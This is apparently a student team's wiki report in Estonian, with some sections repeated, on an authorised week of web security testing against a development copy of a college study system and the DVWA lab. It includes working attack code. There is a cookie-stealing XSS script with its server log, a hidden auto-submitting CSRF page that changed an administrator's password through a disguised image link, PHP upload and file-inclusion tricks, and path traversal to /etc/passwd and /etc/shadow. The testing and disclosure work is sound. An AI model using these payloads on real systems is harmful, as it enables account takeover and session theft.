Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T20:54:50Z

Ulihten: /* Alo tegevus */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
